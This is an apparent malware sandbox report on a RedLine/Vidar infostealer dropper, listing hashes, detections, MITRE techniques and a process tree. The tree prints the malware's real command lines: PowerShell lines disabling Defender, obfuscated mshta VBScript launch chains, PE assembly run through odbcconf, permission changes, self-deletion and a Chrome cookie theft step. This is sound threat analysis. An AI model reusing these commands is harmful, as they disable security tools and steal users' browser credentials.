redline | ea1788286f5505b34e464981240d68a6cfaf3169afabae287ad159944e2d2e06

Analysis

max time kernel
23s
max time network
177s
platform
windows7_x64
resource
win7-en-20211208
submitted
20/12/2021, 14:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ea1788286f5505b34e464981240d68a6cfaf3169afabae287ad159944e2d2e06.exe
Size

18.4MB
MD5

bb9480340b557cb80cc91ba88727154e
SHA1

afa2089d05179e7f625f98856a60ec1c7c52e56d
SHA256

ea1788286f5505b34e464981240d68a6cfaf3169afabae287ad159944e2d2e06
SHA512

cffeaee2e948ac0d675372e4f1d79825c2d9dc8b4623ff85e111c88f3fc91aff5d920166dc61ea2ab59b4431c413f470dfd7085248e501144f11660022e8cdc8

Score

10^/10

redline vidar aspackv2 infostealer stealer

Malware Config

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2604	604	rundll32.exe	99

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 1 IoCs

resource	yara_rule
behavioral1/memory/1596-245-0x0000000000400000-0x00000000007FA000-memory.dmp	family_redline

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral1/files/0x000800000001226a-62.dat	aspack_v212_v242
behavioral1/files/0x000800000001226a-63.dat	aspack_v212_v242
behavioral1/files/0x0008000000012254-64.dat	aspack_v212_v242
behavioral1/files/0x0008000000012254-65.dat	aspack_v212_v242
behavioral1/files/0x00060000000125f3-69.dat	aspack_v212_v242
behavioral1/files/0x00060000000125f3-68.dat	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 4 IoCs

pid	Process
320	setup_install.exe
1712	Wed024e2119d7f00.exe
1728	Wed02a21170b4.exe
1748	Wed0230088c13e7.exe

Loads dropped DLL 16 IoCs

pid	Process
1648	ea1788286f5505b34e464981240d68a6cfaf3169afabae287ad159944e2d2e06.exe
1648	ea1788286f5505b34e464981240d68a6cfaf3169afabae287ad159944e2d2e06.exe
1648	ea1788286f5505b34e464981240d68a6cfaf3169afabae287ad159944e2d2e06.exe
320	setup_install.exe
320	setup_install.exe
320	setup_install.exe
320	setup_install.exe
320	setup_install.exe
320	setup_install.exe
320	setup_install.exe
320	setup_install.exe
1956	cmd.exe
1956	cmd.exe
1952	cmd.exe
1952	cmd.exe
1916	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
76	ipinfo.io
26	ip-api.com
73	ipinfo.io
74	ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
2440	2972	WerFault.exe	128
2240	872	WerFault.exe	39
1724	484	WerFault.exe	52

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3416	timeout.exe

Kills process with taskkill 4 IoCs

evasion

pid	Process
2596	taskkill.exe
2276	taskkill.exe
956	taskkill.exe
2968	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1648 wrote to memory of 320	1648	ea1788286f5505b34e464981240d68a6cfaf3169afabae287ad159944e2d2e06.exe	27
PID 1648 wrote to memory of 320	1648	ea1788286f5505b34e464981240d68a6cfaf3169afabae287ad159944e2d2e06.exe	27
PID 1648 wrote to memory of 320	1648	ea1788286f5505b34e464981240d68a6cfaf3169afabae287ad159944e2d2e06.exe	27
PID 1648 wrote to memory of 320	1648	ea1788286f5505b34e464981240d68a6cfaf3169afabae287ad159944e2d2e06.exe	27
PID 1648 wrote to memory of 320	1648	ea1788286f5505b34e464981240d68a6cfaf3169afabae287ad159944e2d2e06.exe	27
PID 1648 wrote to memory of 320	1648	ea1788286f5505b34e464981240d68a6cfaf3169afabae287ad159944e2d2e06.exe	27
PID 1648 wrote to memory of 320	1648	ea1788286f5505b34e464981240d68a6cfaf3169afabae287ad159944e2d2e06.exe	27
PID 320 wrote to memory of 1052	320	setup_install.exe	29
PID 320 wrote to memory of 1052	320	setup_install.exe	29
PID 320 wrote to memory of 1052	320	setup_install.exe	29
PID 320 wrote to memory of 1052	320	setup_install.exe	29
PID 320 wrote to memory of 1052	320	setup_install.exe	29
PID 320 wrote to memory of 1052	320	setup_install.exe	29
PID 320 wrote to memory of 1052	320	setup_install.exe	29
PID 320 wrote to memory of 1220	320	setup_install.exe	30
PID 320 wrote to memory of 1220	320	setup_install.exe	30
PID 320 wrote to memory of 1220	320	setup_install.exe	30
PID 320 wrote to memory of 1220	320	setup_install.exe	30
PID 320 wrote to memory of 1220	320	setup_install.exe	30
PID 320 wrote to memory of 1220	320	setup_install.exe	30
PID 320 wrote to memory of 1220	320	setup_install.exe	30
PID 320 wrote to memory of 1916	320	setup_install.exe	31
PID 320 wrote to memory of 1916	320	setup_install.exe	31
PID 320 wrote to memory of 1916	320	setup_install.exe	31
PID 320 wrote to memory of 1916	320	setup_install.exe	31
PID 320 wrote to memory of 1916	320	setup_install.exe	31
PID 320 wrote to memory of 1916	320	setup_install.exe	31
PID 320 wrote to memory of 1916	320	setup_install.exe	31
PID 320 wrote to memory of 1952	320	setup_install.exe	32
PID 320 wrote to memory of 1952	320	setup_install.exe	32
PID 320 wrote to memory of 1952	320	setup_install.exe	32
PID 320 wrote to memory of 1952	320	setup_install.exe	32
PID 320 wrote to memory of 1952	320	setup_install.exe	32
PID 320 wrote to memory of 1952	320	setup_install.exe	32
PID 320 wrote to memory of 1952	320	setup_install.exe	32
PID 320 wrote to memory of 1956	320	setup_install.exe	68
PID 320 wrote to memory of 1956	320	setup_install.exe	68
PID 320 wrote to memory of 1956	320	setup_install.exe	68
PID 320 wrote to memory of 1956	320	setup_install.exe	68
PID 320 wrote to memory of 1956	320	setup_install.exe	68
PID 320 wrote to memory of 1956	320	setup_install.exe	68
PID 320 wrote to memory of 1956	320	setup_install.exe	68
PID 320 wrote to memory of 1796	320	setup_install.exe	67
PID 320 wrote to memory of 1796	320	setup_install.exe	67
PID 320 wrote to memory of 1796	320	setup_install.exe	67
PID 320 wrote to memory of 1796	320	setup_install.exe	67
PID 320 wrote to memory of 1796	320	setup_install.exe	67
PID 320 wrote to memory of 1796	320	setup_install.exe	67
PID 320 wrote to memory of 1796	320	setup_install.exe	67
PID 320 wrote to memory of 1628	320	setup_install.exe	33
PID 320 wrote to memory of 1628	320	setup_install.exe	33
PID 320 wrote to memory of 1628	320	setup_install.exe	33
PID 320 wrote to memory of 1628	320	setup_install.exe	33
PID 320 wrote to memory of 1628	320	setup_install.exe	33
PID 320 wrote to memory of 1628	320	setup_install.exe	33
PID 320 wrote to memory of 1628	320	setup_install.exe	33
PID 1956 wrote to memory of 1712	1956	cmd.exe	65
PID 1956 wrote to memory of 1712	1956	cmd.exe	65
PID 1956 wrote to memory of 1712	1956	cmd.exe	65
PID 1956 wrote to memory of 1712	1956	cmd.exe	65
PID 1956 wrote to memory of 1712	1956	cmd.exe	65
PID 1956 wrote to memory of 1712	1956	cmd.exe	65
PID 1956 wrote to memory of 1712	1956	cmd.exe	65
PID 1052 wrote to memory of 1880	1052	cmd.exe	66

C:\Users\Admin\AppData\Local\Temp\ea1788286f5505b34e464981240d68a6cfaf3169afabae287ad159944e2d2e06.exe
"C:\Users\Admin\AppData\Local\Temp\ea1788286f5505b34e464981240d68a6cfaf3169afabae287ad159944e2d2e06.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1648
- C:\Users\Admin\AppData\Local\Temp\7zS0766E306\setup_install.exe
  "C:\Users\Admin\AppData\Local\Temp\7zS0766E306\setup_install.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:320
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1052
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
      4⤵
      PID:1880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
    3⤵
    PID:1220
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      PID:596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed02a21170b4.exe
    3⤵
    - Loads dropped DLL
    PID:1916
  - - C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed02a21170b4.exe
      Wed02a21170b4.exe
      4⤵
      Executes dropped EXE
      PID:1728
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbSCRipt: cLOSe ( creATEOBJeCt( "wSCriPt.ShELL"). rUN ( "Cmd /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed02a21170b4.exe"" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If """" == """" for %g IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed02a21170b4.exe"" ) do taskkill -f /Im ""%~NXg"" " , 0, true) )
        5⤵
        
        PID:2696
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed02a21170b4.exe" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If "" == "" for %g IN ( "C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed02a21170b4.exe" ) do taskkill -f /Im "%~NXg"
        6⤵
        
        PID:2612
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f /Im "Wed02a21170b4.exe"
        7⤵
        Kills process with taskkill
        
        PID:956
        
        C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe
        
        Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E
        7⤵
        
        PID:1832
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbSCRipt: cLOSe ( creATEOBJeCt( "wSCriPt.ShELL"). rUN ( "Cmd /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe"" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If ""-PJJdHOofvf~E"" == """" for %g IN ( ""C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe"" ) do taskkill -f /Im ""%~NXg"" " , 0, true) )
        8⤵
        
        PID:2728
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If "-PJJdHOofvf~E" == "" for %g IN ( "C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe" ) do taskkill -f /Im "%~NXg"
        9⤵
        
        PID:2440
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBScRIpt: close (crEateoBJeCT("wscRIpT.sHELl"). RUn ( "C:\Windows\system32\cmd.exe /q /C ECho | SeT /p = ""MZ"" > 2MXG5k.pR & copy /b /y 2MXG5K.pR + A0kCLvIX.Kc + SpiKDP6.H + ApX~.n4 + G7TV3C~.QZE + P~ST7eWJ.E 9V~4.KU & starT odbcconf.exe /a { reGSVr .\9v~4.Ku } " ,0 , TrUE ) )
        8⤵
        
        PID:3340
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /q /C ECho | SeT /p = "MZ" > 2MXG5k.pR &copy /b /y 2MXG5K.pR +A0kCLvIX.Kc +SpiKDP6.H+ ApX~.n4 + G7TV3C~.QZE + P~ST7eWJ.E 9V~4.KU & starT odbcconf.exe /a { reGSVr .\9v~4.Ku}
        9⤵
        
        PID:3576
        
        C:\Windows\SysWOW64\odbcconf.exe
        
        odbcconf.exe /a { reGSVr .\9v~4.Ku}
        10⤵
        
        PID:3652
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>2MXG5k.pR"
        10⤵
        
        PID:3632
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" ECho "
        10⤵
        
        PID:3624
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed0230088c13e7.exe
    3⤵
    - Loads dropped DLL
    PID:1952
  - - C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed0230088c13e7.exe
      Wed0230088c13e7.exe
      4⤵
      Executes dropped EXE
      PID:1748
    - - C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed02eb70427e264.exe
        
        Wed02eb70427e264.exe
        5⤵
        
        PID:440
      - C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed02eb70427e264.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed02eb70427e264.exe
        6⤵
        
        PID:3824
      - C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed02eb70427e264.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed02eb70427e264.exe
        6⤵
        
        PID:3844
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed02b4833447ac7.exe
    3⤵
    PID:1628
  - - C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed02b4833447ac7.exe
      Wed02b4833447ac7.exe
      4⤵
      PID:1872
    - - C:\Users\Admin\AppData\Local\Temp\RaptorMiner.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RaptorMiner.exe"
        5⤵
        
        PID:2088
    - - C:\Users\Admin\AppData\Local\Temp\9b92a9b433b0c0d63dd84651491f6889c51e4ca0(1).exe
        
        "C:\Users\Admin\AppData\Local\Temp\9b92a9b433b0c0d63dd84651491f6889c51e4ca0(1).exe"
        5⤵
        
        PID:2124
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed0277e0c42127c281.exe
    3⤵
    PID:1836
  - - C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed0277e0c42127c281.exe
      Wed0277e0c42127c281.exe
      4⤵
      PID:1596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed023fd24e4120fc.exe
    3⤵
    PID:1296
  - - C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed023fd24e4120fc.exe
      Wed023fd24e4120fc.exe
      4⤵
      PID:852
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        
        PID:2188
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        Kills process with taskkill
        
        PID:2276
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed022c06e2119f4a.exe
    3⤵
    PID:1828
  - - C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed022c06e2119f4a.exe
      Wed022c06e2119f4a.exe
      4⤵
      PID:1756
    - - C:\Users\Admin\AppData\Local\y2XgbERhSMmp.exe
        
        "C:\Users\Admin\AppData\Local\y2XgbERhSMmp.exe"
        5⤵
        
        PID:2940
    - - C:\Users\Admin\AppData\Local\CkjKvaf7rypfPX.exe
        
        "C:\Users\Admin\AppData\Local\CkjKvaf7rypfPX.exe"
        5⤵
        
        PID:3244
      - C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        6⤵
        
        PID:3448
    - - C:\Users\Admin\AppData\Local\95dzL0oBOFytlv.exe
        
        "C:\Users\Admin\AppData\Local\95dzL0oBOFytlv.exe"
        5⤵
        
        PID:3328
    - - C:\Users\Admin\AppData\Local\K846MHZtSg0np.exe
        
        "C:\Users\Admin\AppData\Local\K846MHZtSg0np.exe"
        5⤵
        
        PID:3384
    - - C:\Users\Admin\AppData\Local\nn9N1QDEVDd.exe
        
        "C:\Users\Admin\AppData\Local\nn9N1QDEVDd.exe"
        5⤵
        
        PID:3676
    - - C:\Users\Admin\AppData\Local\BvBBVeVCzt.exe
        
        "C:\Users\Admin\AppData\Local\BvBBVeVCzt.exe"
        5⤵
        
        PID:3736
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed0260e7a7b37.exe
    3⤵
    PID:1480
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed023e7007c18fc2.exe
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed02fe4273ccb21dc2.exe
    3⤵
    PID:1632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed02d9c9cb3fb58b9d.exe
    3⤵
    PID:896
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed02a59c2649fe16629.exe
    3⤵
    PID:900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed02b89e52b8e0dc0b.exe
    3⤵
    PID:1436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed0217c89eb3b466.exe
    3⤵
    PID:2004
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed02eb70427e264.exe
    3⤵
    PID:1748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed02a438cb97.exe
    3⤵
    PID:996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed02b697a0b8.exe
    3⤵
    PID:1796
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed024e2119d7f00.exe /mixtwo
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1956
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed026890c977.exe
    3⤵
    PID:924
  - - C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed026890c977.exe
      Wed026890c977.exe
      4⤵
      PID:1800
    - - C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed026890c977.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed026890c977.exe
        5⤵
        
        PID:2308
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed028ffcadc61dbd.exe
    3⤵
    PID:1380
  - - C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed028ffcadc61dbd.exe
      Wed028ffcadc61dbd.exe
      4⤵
      PID:1716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed02b116998e99e.exe
    3⤵
    PID:1336
  - - C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed02b116998e99e.exe
      Wed02b116998e99e.exe
      4⤵
      PID:2168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed0299fdfb9e2778da.exe
    3⤵
    PID:836
  - - C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed0299fdfb9e2778da.exe
      Wed0299fdfb9e2778da.exe
      4⤵
      PID:1860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed0225598f0f2.exe
    3⤵
    PID:1548
  - - C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed0225598f0f2.exe
      Wed0225598f0f2.exe
      4⤵
      PID:2108
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Wed0225598f0f2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed0225598f0f2.exe" & del C:\ProgramData\*.dll & exit
        5⤵
        
        PID:2732
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Wed0225598f0f2.exe /f
        6⤵
        Kills process with taskkill
        
        PID:2968
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        6⤵
        Delays execution with timeout.exe
        
        PID:3416
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed0208bd7bb620c3f.exe
    3⤵
    PID:1324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed02b11f57b3ec85ca.exe
    3⤵
    PID:1776
  - - C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed02b11f57b3ec85ca.exe
      Wed02b11f57b3ec85ca.exe
      4⤵
      PID:1696
    - - C:\Users\Admin\AppData\Local\Temp\11111.exe
        
        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        5⤵
        
        PID:2784

C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed02b697a0b8.exe
Wed02b697a0b8.exe
1⤵
PID:824

C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed02a438cb97.exe
Wed02a438cb97.exe
1⤵
PID:568

C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed024e2119d7f00.exe
Wed024e2119d7f00.exe /mixtwo
1⤵
PID:1804
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /im "Wed024e2119d7f00.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed024e2119d7f00.exe" & exit
  2⤵
  PID:2536
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im "Wed024e2119d7f00.exe" /f
    3⤵
    - Kills process with taskkill
    PID:2596

C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed02d9c9cb3fb58b9d.exe
Wed02d9c9cb3fb58b9d.exe
1⤵
PID:1724
- C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed02d9c9cb3fb58b9d.exe
  C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed02d9c9cb3fb58b9d.exe
  2⤵
  PID:2064
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe" /P "Admin:N"
    3⤵
    PID:1376
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe" /P "Admin:N"
      4⤵
      PID:1824
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:2940
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe" /P "Admin:R" /E
    3⤵
    PID:2220
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c echo Y|CACLS "C:\Users\Admin\AppData\Local\Temp\6829558ede" /P "Admin:N"
    3⤵
    PID:2920
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "C:\Users\Admin\AppData\Local\Temp\6829558ede" /P "Admin:N"
      4⤵
      PID:1800
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
      4⤵
      PID:868
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c CACLS "C:\Users\Admin\AppData\Local\Temp\6829558ede" /P "Admin:R" /E
    3⤵
    PID:2556
  - - C:\Windows\SysWOW64\cacls.exe
      CACLS "C:\Users\Admin\AppData\Local\Temp\6829558ede" /P "Admin:R" /E
      4⤵
      PID:2352
- - C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe
    "C:\Users\Admin\AppData\Local\Temp\6829558ede\tkools.exe"
    3⤵
    PID:2972
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 632
      4⤵
      Program crash
      PID:2440

C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed0260e7a7b37.exe
Wed0260e7a7b37.exe
1⤵
PID:872
- C:\Users\Admin\Pictures\Adobe Films\XFmn9eyfo8qYkncRVMH2SaSP.exe
  "C:\Users\Admin\Pictures\Adobe Films\XFmn9eyfo8qYkncRVMH2SaSP.exe"
  2⤵
  PID:3008
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 872 -s 572
  2⤵
  - Program crash
  PID:2240

C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed0230088c13e7.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed0230088c13e7.exe" -u
1⤵
PID:1992

C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed023e7007c18fc2.exe
Wed023e7007c18fc2.exe
1⤵
PID:1016

C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed02fe4273ccb21dc2.exe
Wed02fe4273ccb21dc2.exe
1⤵
PID:516

C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed02a59c2649fe16629.exe
Wed02a59c2649fe16629.exe
1⤵
PID:1656

C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed0217c89eb3b466.exe
Wed0217c89eb3b466.exe
1⤵
PID:1096
- C:\Users\Admin\AppData\Local\Temp\is-52LOS.tmp\Wed0217c89eb3b466.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-52LOS.tmp\Wed0217c89eb3b466.tmp" /SL5="$1015C,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed0217c89eb3b466.exe"
  2⤵
  PID:1168
- - C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed0217c89eb3b466.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed0217c89eb3b466.exe" /SILENT
    3⤵
    PID:2492
  - - C:\Users\Admin\AppData\Local\Temp\is-MV0O1.tmp\Wed0217c89eb3b466.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-MV0O1.tmp\Wed0217c89eb3b466.tmp" /SL5="$2015C,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed0217c89eb3b466.exe" /SILENT
      4⤵
      PID:2640

C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed02b89e52b8e0dc0b.exe
Wed02b89e52b8e0dc0b.exe
1⤵
PID:484
- C:\Users\Admin\Pictures\Adobe Films\XFmn9eyfo8qYkncRVMH2SaSP.exe
  "C:\Users\Admin\Pictures\Adobe Films\XFmn9eyfo8qYkncRVMH2SaSP.exe"
  2⤵
  PID:2424
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 484 -s 752
  2⤵
  - Program crash
  PID:1724

C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed02b697a0b8.exe
Wed02b697a0b8.exe
1⤵
PID:1876

C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed024e2119d7f00.exe
Wed024e2119d7f00.exe /mixtwo
1⤵
- Executes dropped EXE
PID:1712

C:\Users\Admin\AppData\Local\Temp\is-AKIKI.tmp\Wed028ffcadc61dbd.tmp
"C:\Users\Admin\AppData\Local\Temp\is-AKIKI.tmp\Wed028ffcadc61dbd.tmp" /SL5="$10162,140047,56320,C:\Users\Admin\AppData\Local\Temp\7zS0766E306\Wed028ffcadc61dbd.exe"
1⤵
PID:2148

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:2604
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:2816

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

T1102

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/320-79-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/320-82-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/320-89-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/320-75-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/320-76-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
